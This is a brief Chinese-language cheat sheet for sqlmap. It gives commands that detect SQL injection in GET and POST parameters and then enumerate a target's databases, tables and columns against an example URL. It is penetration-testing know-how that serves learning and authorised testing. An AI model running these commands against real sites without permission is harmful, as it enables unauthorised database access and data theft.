sqlmap用于
sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。注意:sqlmap只是用来检测和利用sql注入点的,使用前请先使用扫描工具扫出sql注入点。
1、检测注入
GET注入
sqlmap -u “http://www.vuln.cn/post.php?id=1″ 默认使用level1检测全部数据库类型
sqlmap -u “http://www.vuln.cn/post.php?id=1″ –dbms mysql –level 3 指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面
post中注入可以使用Fiddler工具来抓取post包,把请求保存在txt文件里 sqlmap -r “c:\tools\request.txt” -p “username” –dbms mysql 指定username参数
(-u:指定注入点url;-r REQUESTFILE 从一个文件中载入HTTP请求;-p TESTPARAMETER 可注入的参数)
2、爆库:sqlmap -u "url(注入点)" --dbs (有的系统支持的不是sqlmap+参数,而是Python sqlmap.py+参数)
3、爆表:sqlmap -u "url" -D 要爆的表所在库 --tables
4、爆字段:sqlmap -u "url" -D (库) -T (表)--columns
参考文章:https://www.cnblogs.com/50614090/p/6086054.html